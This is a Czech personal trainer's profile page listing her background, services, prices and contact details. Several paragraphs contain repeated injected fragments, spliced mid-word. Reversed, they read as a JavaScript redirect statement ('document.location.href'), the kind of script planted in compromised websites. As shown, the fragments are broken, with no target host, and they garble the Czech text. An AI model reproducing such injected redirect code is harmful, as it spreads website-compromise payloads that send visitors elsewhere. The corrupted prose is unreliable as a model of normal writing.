Rainbow page separator

VERONIKA JAMBOROVÁ – osobní trenér, výživový poradce, masér

V oblasti fitness se pohybuji více než 20 let. Mám zkušenosti s nejrůznějšími – všemi druhy diet, 🙂 nabíráním svalové hmoty-zkusila jsem i “zaručené“ me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tody vedoucí k rozvoji těla a fitness soutěž.

Poznala jsem však i stinnou stránku a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zdravotní, chronické potíže z důvodu disbalance celého těla, přetížení nevhodným cvičením, ale i běžným stereotypem života.
To vše mě vedlo k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, abych se začala zabývat primárně zdravotní stránkou pohybu.

Mým cílem je tedy pracovat s klientem tak, aby se pro něj stal pohyb radostí a změny, které chce učinit, probíhaly nenásilně a v souladu s nasloucháním svému tělu.

Nabízím:

  • individuální tréninky, při kterých dbám především na zdravý rozvoj těla, zbavení se bolestí, uvolněné blokád a postupné zpevnění, které dovolí tělu větší zátěž (úbytek tuku, nárůst svalové hmoty)
  •  správné držení těla (s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toj, sed, chůze, dech,…)
  • výživové poradenství
  • základy cvičení v posilovně
  • cvičení pro pokročilé v posilovně

V současnosti pracuji v soukromé posilovně Mgr. Lukáše Bureše.
Jeho spolupráce si velmi vážím a tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mu děkuji.

Ceník:

  • Cvičební jednotka 55 min 350 Kč
  • Permanentka 10 vstupů 3.300 Kč

Kontakt:

E-mail: veronika.jamborova@seznam.cz
Tel.: +420725 894 374

FB: https://www.facebook.com/veronika.jamborova